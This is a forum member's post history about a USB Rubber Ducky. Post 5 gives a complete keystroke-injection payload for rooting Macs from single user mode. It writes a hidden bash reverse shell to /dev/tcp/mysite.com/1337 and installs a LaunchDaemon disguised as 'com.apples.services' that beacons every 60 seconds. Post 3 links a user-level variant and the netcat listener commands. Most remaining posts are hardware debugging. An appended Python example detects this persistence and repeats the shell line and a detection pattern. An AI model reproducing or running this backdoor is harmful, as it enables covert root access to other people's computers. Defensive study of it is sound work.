
mosca1337
Active Members, 14 posts

Everything posted by mosca1337

  1. If I remember correctly, I think I tried something similar to this. I believe that once you catch the reverse shell and then close the session, the script is killed. Then you may not ever receive another reverse shell.
  2. If you catch a netcat shell, you should be able to navigate their file system and download files.
  3. As requested, I made a modification to my root backdoor for OSX. This script will open a terminal from Spotlight and install a persistent reverse shell that will call home every 60 seconds. This will give you a user level shell for when you are unable or it is impossible to boot into single user mode. Change the domain/IP address to yours and catch with netcat: 'nc -l -p 1337' or 'nc -l 1337' on Macs.
     GUI - user payload: https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---OSX-User-Backdoor
     Single user mode - root payload: https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---OSX-Root-Backdoor
     Tutorial: http://patrickmosca.com/root-a-mac-in-10-seconds-or-less/
  4. I had a lot of fun making it. Glad you like it!
  5. Hey everyone! I wrote a quick and dirty script that'll root Macs from single user mode. There are practically no defenses to this besides full disk encryption. I challenge you to try it out if you have free time. You won't be disappointed. Grab the payload here. Also, I wrote a quick tutorial that describes the ins and outs of the attack here. (site is new and heavily under construction lol)

         REM Patrick Mosca
         REM A simple script for rooting OSX from single user mode.
         REM Change mysite.com to your domain name or IP address
         REM Change 1337 to your port number
         REM Catch the shell with 'nc -l -p 1337'
         REM http://patrickmosca.com/root-a-mac-in-10-seconds-or-less/
         DELAY 1000
         STRING mount -uw /
         ENTER
         DELAY 2000
         STRING mkdir /Library/.hidden
         ENTER
         DELAY 200
         STRING echo '#!/bin/bash
         ENTER
         STRING bash -i >& /dev/tcp/mysite.com/1337 0>&1
         ENTER
         STRING wait' > /Library/.hidden/connect.sh
         ENTER
         DELAY 500
         STRING chmod +x /Library/.hidden/connect.sh
         ENTER
         DELAY 200
         STRING mkdir /Library/LaunchDaemons
         ENTER
         DELAY 200
         STRING echo '<plist version="1.0">
         ENTER
         STRING <dict>
         ENTER
         STRING <key>Label</key>
         ENTER
         STRING <string>com.apples.services</string>
         ENTER
         STRING <key>ProgramArguments</key>
         ENTER
         STRING <array>
         ENTER
         STRING <string>/bin/sh</string>
         ENTER
         STRING <string>/Library/.hidden/connect.sh</string>
         ENTER
         STRING </array>
         ENTER
         STRING <key>RunAtLoad</key>
         ENTER
         STRING <true/>
         ENTER
         STRING <key>StartInterval</key>
         ENTER
         STRING <integer>60</integer>
         ENTER
         STRING <key>AbandonProcessGroup</key>
         ENTER
         STRING <true/>
         ENTER
         STRING </dict>
         ENTER
         STRING </plist>' > /Library/LaunchDaemons/com.apples.services.plist
         ENTER
         DELAY 500
         STRING chmod 600 /Library/LaunchDaemons/com.apples.services.plist
         ENTER
         DELAY 200
         STRING launchctl load /Library/LaunchDaemons/com.apples.services.plist
         ENTER
         DELAY 1000
         STRING shutdown -h now
         ENTER
  6. Posted the script here: https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---OSX-Root-Backdoor and tutorial here: http://patrickmosca.com/root-a-mac-in-10-seconds-or-less/
  7. No, I'm just going crazy. I flashed back to v2 and then to your v2.1. It works!!!! It's funny how one bit can cause so much trouble haha. Thanks again for the help!
  8. Same results as the previous. I ran the command

         tail -c 2097152 duck_v2.1.hex | grep 0000010300
         :1082D00009022200010100A032090400000103008C

     Those might represent the values:

         Interface #0 - 0x00
         Alternate Setting - 0x00
         Number of Endpoints - 0x01
         Interface Class - 0x03
         Interface Subclass - 0x00

     Changing it to 0000010301 may work? I'm having a hard time figuring out how to find and replace in hex though.
  9. I found an article that may help: http://www.usb.org/developers/devclass_docs/HID1_11.pdf
     Page 18: Description of Subclass codes
     Bottom of page 77: bInterfaceSubClass - Offset/size (bytes) 6/1 - Boot Interface subclass - 0x01
  10. Does not work in regular or single user. This time the ducky is recognized as a "logitech" keyboard though.

          Device subclass: 1
          Interface subclass: 0

      Swap those two, and hopefully we'll get lucky.
  11. I think we're getting closer. It appears as though the "Device subclass" was changed to 1 instead of "Interface subclass". With the v2.1 hex, OSX doesn't recognize the ducky as a keyboard in regular or single user mode. Also, it appears as though the vidpin.bin is no longer read. The ducky appears to be an "Atmel Corporation" VIDPIN instead of the desired logitech VIDPIN. I attached a screenshot of the ducky with the new hex. Thanks!
  12. Also here are two screenshots of some debugging using Apple's USB Prober app. The device labeled "HID Keyboard" is the ducky that is imitating the VID and PID of the true logitech keyboard. The device labeled "USB Multimedia Keyboard" is the logitech keyboard. I noticed that towards the bottom there is an "Interface subclass". The ducky is 0 (false) and the logitech is 1 (Boot interface). I immediately correlate the words "single user mode" and "boot". I know nothing about USB devices, but could setting the value to 1 somehow make the ducky keyboard "visible" at startup in single user mode? Is there any way to hardcode these Device Descriptors?
  13. Yes, single user mode is very limited. I do not believe that is the problem. I can plug any keyboard into any Mac in single user mode, and they are all usable. So I created a vidpid.bin at the root of the SD card. I was able to change the VID and PID properly. On OSX, you can run:

          system_profiler SPUSBDataType

      Will give:

          HID Keyboard:
            Product ID: 0xc312
            Vendor ID: 0x046d (Logitech Inc.)
            Version: 1.00
            Speed: Up to 12 Mb/sec
            Manufacturer: ATMEL AVR
            Location ID: 0x06200000 / 4
            Current Available (mA): 500
            Current Required (mA): 100

      This will give the VID and PID of all attached USB devices. I connected the working keyboard and copied the VID and PID over to the Ducky. Running the above command again, I was able to confirm that the Ducky had successfully cloned the VID and PID of the previously working keyboard. I also tried a handful of the VIDS and PIDS files available on google code. Still no luck. I flashed the ducky with duck_v2.hex and also osx.hex. I compiled a hello world script on Duck encoder V2.4. Again, the script works just fine on any computer, but isn't recognized in single user mode. I know this is possible because the ducky is a "keyboard", and keyboards work in single user mode. I know it's possible!!! I appreciate the help btw
  14. Hey, I need some help debugging my new ducky. I've made some simple 'hello world' ducky scripts without any issues. They run on mac, windows, linux etc. without any problems. I tried the same simple script in OSX's single user mode with no luck. It appears as though OSX in single user mode does not recognize the ducky as a keyboard? I tried increasing the string delay of the script so that it would type much slower. No luck. I have also tried plugging in external USB keyboards (such as my dell keyboard). Those are all recognized in single user mode. I tried the ducky on desktop Macs and MacBook Pros. Also no difference. Here is a test script:

          STRING_DELAY 50
          DELAY 3000
          STRING Hello World
          ENTER

      I'm really hoping that I am just making a small mistake. I've tried compiling my ducky script using 2.4, 3.0, and with the online tool. Again, any help would be appreciated! I have a real kickass script for quickly rooting Macs that I would like to share. Thanks!
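Added editor's example, not part of any post above: a defender-side Python check that parses a LaunchDaemon plist like the one the post 5 payload writes and flags the artefacts it leaves behind (an Apple-lookalike label, a dot-prefixed hidden path, a reverse-shell pattern in the referenced script, and a shell re-launched on a short StartInterval). The SCRIPTS lookup is a constructed stand-in for reading the referenced file from disk; on a real host you would feed it the files under /Library/LaunchDaemons.

```python
"""Flag LaunchDaemon persistence like the payload in post 5 (added example)."""
import plistlib
import re

# Constructed sample: the plist the payload above writes to /Library/LaunchDaemons.
BACKDOOR_PLIST = b"""<plist version="1.0"><dict>
<key>Label</key><string>com.apples.services</string>
<key>ProgramArguments</key>
<array><string>/bin/sh</string><string>/Library/.hidden/connect.sh</string></array>
<key>RunAtLoad</key><true/>
<key>StartInterval</key><integer>60</integer>
<key>AbandonProcessGroup</key><true/>
</dict></plist>"""

# Constructed benign daemon for comparison.
BENIGN_PLIST = b"""<plist version="1.0"><dict>
<key>Label</key><string>com.example.backup</string>
<key>ProgramArguments</key><array><string>/usr/local/bin/backup</string></array>
<key>StartInterval</key><integer>3600</integer>
</dict></plist>"""

# Hypothetical stand-in for reading the scripts a daemon points at (constructed).
SCRIPTS = {"/Library/.hidden/connect.sh":
           "#!/bin/bash\nbash -i >& /dev/tcp/mysite.com/1337 0>&1\nwait"}

# Patterns typical of bash reverse shells.
REVERSE_SHELL_RE = re.compile(r"/dev/tcp/|bash -i")

def assess(plist_bytes: bytes, scripts: dict) -> list:
    """Return human-readable findings for one LaunchDaemon plist."""
    d = plistlib.loads(plist_bytes, fmt=plistlib.FMT_XML)
    findings = []
    label = d.get("Label", "")
    # Labels that look Apple-owned but are not in Apple's reverse-DNS namespace.
    if "apple" in label.lower() and not label.startswith("com.apple."):
        findings.append(f"label mimics Apple: {label}")
    args = d.get("ProgramArguments", [])
    for a in args:
        # Any dot-prefixed path component hides the file from Finder and plain ls.
        if any(p.startswith(".") for p in a.split("/") if p):
            findings.append(f"hidden path: {a}")
        body = scripts.get(a)
        if body and REVERSE_SHELL_RE.search(body):
            findings.append(f"reverse-shell pattern in {a}")
    interval = d.get("StartInterval", 0)
    # A shell re-launched every few minutes is a beaconing pattern, not a job.
    if 0 < interval <= 300 and args and args[0] in ("/bin/sh", "/bin/bash"):
        findings.append(f"shell re-launched every {interval}s")
    return findings
```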